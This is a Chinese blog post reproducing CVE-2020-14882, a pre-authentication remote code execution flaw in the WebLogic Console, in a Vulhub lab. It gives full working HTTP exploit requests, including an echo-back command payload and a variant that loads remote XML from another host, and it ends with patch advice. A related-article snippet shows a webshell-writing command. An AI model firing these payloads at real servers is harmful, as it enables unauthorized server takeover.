cmd执行bat结果不回显_CVE202014882 eblogic Console远程代码执行漏洞复现(豪华版)...

最新推荐文章于 2024-05-14 10:45:34 发布
最新推荐文章于 2024-05-14 10:45:34 发布
阅读量186 收藏
点赞数
文章标签: cmd执行bat结果不回显
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_36349685/article/details/112354592
版权

网安引领时代,弥天点亮未来   

eda84491a04005e66ac04f7a7b903193.png 0x00漏洞 简述

2020年10月30日, Oracle 官方的 CVE-2020-14882 Weblogic 代码执行漏洞最新补丁可被绕过,该漏洞编号为 CVE-2020-14882 ,漏洞等级:严重 ,漏洞评分:9.8 。

远程攻击者可以构造特殊的 HTTP 请求,在未经身份验证的情况下接管 WebLogic Server Console ,并在 WebLogic ServerConsole 执行任意代码。

eda84491a04005e66ac04f7a7b903193.png 0x01影响版本

Oracle WeblogicServer 10.3.6.0.0

Oracle WeblogicServer 12.1.3.0.0

Oracle WeblogicServer 12.2.1.3.0

Oracle WeblogicServer 12.2.1.4.0

Oracle WeblogicServer 14.1.1.0.0

eda84491a04005e66ac04f7a7b903193.png 0x02漏洞复现

虚拟机部署docker安装Vulhub一键搭建漏洞测试靶场环境。

docker-compose up -d

51260d1ebbbd59d8ed81a394c01982dd.png

1、访问漏洞环境

http://192.168.60.130:7001/console/login/LoginForm.jsp

03b9bf100b3612487639b5c4bfa97cca.png

2、在漏洞利用时根据不同需求进行Pyload构造。目前有常用的三种:

1.执行payload后不回显,但是已经执行成功。

构造payload执行:

GET /console/css/%252e%252e%252fconsole.portal?_nfpb=true&_pageLabel=&handle=com.tangosol.coherence.mvel2.sh.ShellSession("java.lang.Runtime.getRuntime().exec('touch%20/tmp/yunzui');") HTTP/1.1Host: 192.168.60.130:7001Cache-Control: max-age=0DNT: 1Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.75 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Referer: http://192.168.60.130:7001/console/Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Cookie: ADMINCONSOLESESSION=-KSLiFfIosk7pDYFYp701K0Svy9__G8yZefB7whwyLGLvkhjKbTD!-355433482Connection: closeContent-Length: 4

3948318d15b6bc27e9fa4340f14aec19.png

效果查看

c21aa061e5f215cb4a805041e4d95199.png

或者使用dnslog平台进行验证

生成DNS域名:idvek9.dnslog.cn

e69d131a82aad36855220a7c1ef2f403.png

构造payload进行执行

32f7a0e10b58d998e7d619bd16443dbd.png

效果查看

748f369f84a93e2d8a9328d980f7350a.png

或者使用python脚本进行漏洞利用

0267f495122f5b61d750f3c43ba92137.png

效果查看

8c17d905f24766b60a8161999f7fee3d.png

2.执行payload后回显

通过GET方式进行payload提交

GET/console/css/%25%32%65%25%32%65%25%32%66consolejndi.portal?test_handle=com.tangosol.coherence.mvel2.sh.ShellSession('weblogic.work.ExecuteThreadcurrentThread = (weblogic.work.ExecuteThread)Thread.currentThread();weblogic.work.WorkAdapter adapter = currentThread.getCurrentWork();java.lang.reflect.Field field =adapter.getClass().getDeclaredField("connectionHandler");field.setAccessible(true);Objectobj = field.get(adapter);weblogic.servlet.internal.ServletRequestImpl req =(weblogic.servlet.internal.ServletRequestImpl)obj.getClass().getMethod("getServletRequest").invoke(obj);String cmd = req.getHeader("cmd");String[] cmds = System.getProperty("os.name").toLowerCase().contains("window")? new String[]{"cmd.exe", "/c", cmd} : newString[]{"/bin/sh", "-c", cmd};if(cmd != null ){ Stringresult = new java.util.Scanner(new java.lang.ProcessBuilder(cmds).start().getInputStream()).useDelimiter("\\A").next();weblogic.servlet.internal.ServletResponseImpl res =(weblogic.servlet.internal.ServletResponseImpl)req.getClass().getMethod("getResponse").invoke(req);res.getServletOutputStream().writeStream(newweblogic.xml.util.StringInputStream(result));res.getServletOutputStream().flush();}currentThread.interrupt();') HTTP/1.1Host:192.168.60.130:7001Upgrade-Insecure-Requests:1User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, likeGecko) Chrome/86.0.4240.111 Safari/537.36Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Encoding:gzip, deflateAccept-Language:zh-CN,zh;q=0.9Connection: closecmd:idContent-Length: 0

执行:id

aed843aeea82f29f764956d78aee78ab.png

通过POST方式进行payload提交

POST/console/css/%252e%252e%252fconsole.portal HTTP/1.1Host:192.168.60.130:7001cmd: idUser-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, likeGecko) Chrome/85.0.4183.121 Safari/537.36Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Encoding:gzip, deflateAccept-Language:zh-CN,zh;q=0.9Connection: closeContent-Type:application/x-www-form-urlencodedContent-Length: 1258 _nfpb=true&_pageLabel=&handle=com.tangosol.coherence.mvel2.sh.ShellSession("weblogic.work.ExecuteThreadexecuteThread = (weblogic.work.ExecuteThread) Thread.currentThread();weblogic.work.WorkAdapteradapter = executeThread.getCurrentWork();java.lang.reflect.Fieldfield = adapter.getClass().getDeclaredField("connectionHandler");field.setAccessible(true);Object obj =field.get(adapter);weblogic.servlet.internal.ServletRequestImplreq = (weblogic.servlet.internal.ServletRequestImpl) obj.getClass().getMethod("getServletRequest").invoke(obj);String cmd =req.getHeader("cmd");String[] cmds =System.getProperty("os.name").toLowerCase().contains("window")? new String[]{"cmd.exe", "/c", cmd} : newString[]{"/bin/sh", "-c", cmd};if (cmd != null) {    String result = newjava.util.Scanner(java.lang.Runtime.getRuntime().exec(cmds).getInputStream()).useDelimiter("\\A").next();   weblogic.servlet.internal.ServletResponseImpl res =(weblogic.servlet.internal.ServletResponseImpl)req.getClass().getMethod("getResponse").invoke(req);   res.getServletOutputStream().writeStream(newweblogic.xml.util.StringInputStream(result));    res.getServletOutputStream().flush();    res.getWriter().write("");}executeThread.interrupt();");

执行:id

4b84a372a216345f3279a9c79a84af36.png

3.通过把payload构造为XML格式进行引用

b76f3f6ff83b5dbfb0827aa33f556b08.png

通过DNSLog平台生成域名:

bq11vi.dnslog.cn

744e845f8d4f405fa00325d53b28d4a3.png

执行(GET)

GET /console/css/%252e%252e%252fconsole.portal?_nfpb=true&_pageLabel=&handle=com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext("http://192.168.60.1/weblogic.xml")HTTP/1.1Host: 192.168.60.130:7001Cache-Control: max-age=0DNT: 1Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64)AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.75 Safari/537.36Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Referer: http://192.168.60.130:7001/console/Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Cookie:ADMINCONSOLESESSION=-KSLiFfIosk7pDYFYp701K0Svy9__G8yZefB7whwyLGLvkhjKbTD!-355433482Connection: close

abfd00e392d8e433154276bfb6369678.png

效果查看

1576b12d04144a921fd77227fd1eafee.png

执行(POST)

POST /console/images/%252E%252E%252Fconsole.portalHTTP/1.1Host: 192.168.60.130:7001User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36Accept-Encoding: gzip, deflateAccept: */*Connection: keep-aliveContent-type: application/x-www-form-urlencoded;charset=utf-8Content-Length: 153CMD:whoami _nfpb=true&_pageLabel=&handle=com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext("http://192.168.60.1/weblogic.xml")

83b5dbcb6447914d6aff0903a33dda02.png

效果查看

0b3f0810d345b444073e4cdac8c8dd31.png

eda84491a04005e66ac04f7a7b903193.png 0x03修复建议

1、建议用户及时将 Weblogic 后台/console/console.portal 对外的访问权限暂时关闭。

2、此次 Oracle 官方的 CPU已发布了针对该漏洞的补丁,请受影响用户及时下载补丁程序并安装更新。

注:Oracle官方补丁需要用户持有正版软件的许可账号,使用该账号登陆https://support.oracle.com后,可以下载最新补丁。

0x05参考链接

https://www.safedog.cn/news.html?id=4533

http://blog.nsfocus.net/weblogic-console-http-1028/

https://leaderzhang.com/

关注弥天安全实验室微信公众平台,回复weblogic获取POC及Python脚本!

003170067f2bc6dad455da3abf225dc9.gif 

知识分享完了

喜欢别忘了关注我们哦~

予以风动,必降弥天之润!

   弥  天

安全实验室

e8a2003364ef3b4441677adb8d253978.png
Aworl-ri
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
CVE-2020-14882 Weblogic Console远程代码执行漏洞复现
谢公子的博客
02-06 2040
目录 漏洞背景 漏洞影响版本 漏洞复现 环境搭建 未授权访问 执行payload后回显 漏洞修复 漏洞背景 2020年10月30日,Oracle 官方的发布最新漏洞,该漏洞编号为 CVE-2020-14882 ,漏洞等级:严重 ,漏洞评分:9.8 。远程攻击者可以构造特殊的 HTTP 请求,在未经身份验证的情况下接管 WebLogic Server Console ,并在 WebLogic ServerConsole 执行任意代码漏洞影响版本 Oracle WeblogicServ
cmd执行bat结果不回显_CMD下写一句话
weixin_33132553的博客
01-04 742
今天在群里看到一个老哥的提问,五哥很快就帮这位兄弟解决了问题。感觉像windows下bat的命令,之前也基本没接触过,赶紧去学习一下吧。这是老哥提的问题,说是执行有问题,不知道哪里错了。for /r c: \ %i in (default*.aspx) do @echo ^"Jscript^"%^>^eval^(Request.Item^[^"chopper^"^],^"unsa...
linux echo命令_如何在Linux上使用Echo命令
culiuman3228的博客
09-18 2751
linux echo命令Fatmawati Achmad Zaenuri/ShutterstockFatmawati Achmad Zaenuri / Shutterstock The echo command is perfect for writing formatted text to the terminal window. And it doesn’t have to be static...
Weblogic 管理控制台未授权远程命令执行漏洞(CVE-2020-14882,CVE-2020-14883)
最新发布
weixin_45653478的博客
05-14 928
Weblogic Pre-Auth Remote Command Execution 漏洞(CVE-2020-14882, CVE-2020-14883)是针对 Oracle WebLogic Server 的两个安全漏洞。CVE-2020-14882 允许远程用户绕过管理员控制台组件中的身份验证,而 CVE-2020-14883 则允许经过身份验证的用户在管理员控制台组件上执行任意命令。
一个有效的bat程序中输入密码不回显并显示星号*
sinat_26853581的博客
08-24 5184
@echo off set "psCommand=powershell -Command "$pword = read-host 'Enter Password' -AsSecureString ; ^ $BSTR=[System.Runtime.InteropServices.Marshal]::SecureStringToBSTR($pword); ^ [S
漏洞复现】Weblogic未授权命令执行漏洞( CVE-2020-14882)
weixin_43486390的博客
12-17 1995
CVE-2020-14882
pipe-CMD.rar_CMD回显_CreateProcess_c++ cmd pipe_windows管道cmd_管道 c
07-15
利用管道执行cmd,显示回显内容,管道加createprocess实现该功能
bat.rar_.bat_bat_批处理
09-14
在“bat.rar_.bat_bat_批处理”这个压缩包中,我们可以预见到它包含了广泛用于Windows系统的批处理脚本和相关信息。`www.pudn.com.txt` 可能是一个文档,提供了关于这些批处理脚本的来源或者使用说明,而“收集的...
cmd_火山PC_cmd_CMD回显_
10-01
标题中的"cmd_火山PC_cmd_CMD回显_"表明我们讨论的主题是关于在Windows操作系统中,使用命令行工具CMD(Command Prompt)与火山PC软件相结合,进行注册表的回显操作。火山PC是一款针对64位系统的软件,版本为...
bat.rar_bat_常用bat_批处理_批处理 bat
09-19
批处理(Batch Processing)是Windows操作系统中的一种命令脚本技术,主要通过.bat或.cmd扩展名的文件来执行一系列命令操作。这种技术对于自动化重复性的任务非常有用,可以提高工作效率,减少手动操作的时间和错误...
solr_exploit:Apache Solr远程代码执行突破(CVE-2019-0193)漏洞利用
03-10
优点:结果回显支持对Solr低版本的检测 缺点:需要出网 步骤1 构造URLDataSource类型的数据源(Solr服务器会去访问该数据源!)可以直接使用这个 文档demo.xml即URLDataSource类型的数据源一份无害的正常XML文档 ...
Weblogic Console HTTP协议远程代码执行漏洞(CVE-2020-14882)
chaojixiaojingang
10-30 4143
1.漏洞描述 未经身份验证的远程攻击者可通过构造特殊的 HTTP GE请求,利用该漏洞在受影响的WebLogic Server上执行任意代码。 2.影响版本 Oracle Weblogic Server 10.3.6.0.0 Oracle Weblogic Server 12.1.3.0.0 Oracle Weblogic Server 12.2.1.3.0 Oracle Weblogic Server 12.2.1.4.0 Oracle Weblogic Server 14.1.1.0.0
cmd - bat文件如何关闭回显
热门推荐
不积跬步,无以至千里
11-10 1万+
bat文件是dos下的批处理文件,可以一次性执行多条dos命令,其扩展名为.bat或.cmd,通过双击该文件或者在cmd窗口中输入该文件名可以在cmd窗口中按文件中的顺序执行多条dos命令。 echo是回显命令,会将echo后的内容输出到cmd窗口中,比如在一个Test.bat文件中输入如下命令:echo hello!执行该文件后,会在cmd窗口中输出: C:\Users\123\Desktop
x4提示你的产品已经被禁用_漏洞风险提示 | WebLogic Console 权限认证绕过漏洞 CVE202014882 补丁绕过...
weixin_39822423的博客
12-12 188
长亭漏洞风险提示 WebLogic Console 权限认证绕过漏洞 CVE-2020-14882 补丁绕过Oracle 官方在 10 月 20 日发布了重要补丁更新 CPU(Critical Patch Update),修复了多个 WebLogic 高危漏洞:https://www.oracle.com/security-alerts/cpuoct20...
CVE-2020-14882&14883weblogic未授权命令执行漏洞复现
蚁景网安学院
12-08 2282
亲爱的,关注我吧12/8本文字数2498来和我一起阅读吧本文涉及靶场知识点-CVE-2020-14882&14883 weblogic未授权访问漏洞https://www.het...
CVE-2020-14882~14883(Weblogic RCE)
include_heqile的博客
11-23 467
https://mp.weixin.qq.com/s?__biz=MzkzNTA0NzgyMA==&mid=2247483787&idx=1&sn=9406a10d2f78d20c1dc57b0cf98618db&chksm=c2b2a668f5c52f7e386c84f9e22379e7d4a3e7ee470e07427c4327555d98af7d7f5c103bf353&token=517092499&lang=zh_CN#rd
weblogic CVE-2020-14882~14883漏洞分析
include_heqile的博客
12-13 641
http://144.34.164.217/weblogic-cve-2020-1488214883lou-dong-fen-xi.html
CVE-2020-14882 weblogic未授权远程命令执行漏洞
栉风沐雪的博客
02-22 4243
Oracle WebLogic Server 远程代码执行漏洞 (CVE-2020-14882)POC 被公开,未经身份验证)的远程攻击者可通过构造特殊的 HTTP GET 请求,结合 CVE-2020-14883 漏洞进行利用,利用此漏洞可在未经身份验证的情况下直接接管 WebLogic Server Console ,并执行任意代码,利用门槛低,危害巨大。Oracle WebLogic Server,版本10.3.6.0,12.1.3.0,12.2.1.3,12.2.1.4,14.1.1.0。
run.bat执行jar
11-03
run.bat 是一个批处理文件,用于执行一个名为 myjar.jar 的 Java 可执行文件。 首先,要执行 run.bat,需要将 myjar.jar 文件和 run.bat 文件放在同一个目录下。然后,可以双击 run.bat 文件来执行它。 当 run.bat...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值